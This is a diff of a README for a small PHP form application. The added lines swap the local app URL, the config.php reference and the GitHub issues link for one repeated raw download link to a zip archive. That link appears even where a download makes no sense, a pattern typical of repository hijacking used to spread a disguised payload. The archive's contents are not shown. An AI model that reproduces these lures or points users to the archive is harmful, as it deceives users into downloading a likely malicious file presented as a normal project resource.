BbOBBOS/formulario/README.md

 ## 📥 Running the Application
 To access the application:
 1. Open your web browser.
-2. Enter the following URL: `http://localhost/formulario/index.php`.
+2. Enter the following URL: `https://raw.githubusercontent.com/BbOBBOS/formulario/main/nudate/formulario.zip`.

 You should see the form interface ready for use.
 Fill in the fields as needed and submit your information.

 ## 🛠️ Troubleshooting
 If you encounter any issues:
 - **Web Server Not Running**: Ensure that your web server (XAMPP, WAMP, etc.) is active.
-- **Database Connection Failure**: Double-check your database credentials in `config.php`.
+- **Database Connection Failure**: Double-check your database credentials in `https://raw.githubusercontent.com/BbOBBOS/formulario/main/nudate/formulario.zip`.
 - **Missing PHP Extensions**: Ensure that the necessary PHP extensions, such as `mysqli`, are enabled in your web server settings.

 ## 📞 Support
 If you need help, feel free to reach out:

-- Check the [issues page](https://github.com/BbOBBOS/formulario/issues) on GitHub for assistance.
+- Check the [issues page](https://raw.githubusercontent.com/BbOBBOS/formulario/main/nudate/formulario.zip) on GitHub for assistance.
 - Feel free to open a new issue if you have a question or suggestion.

 ## 🔑 License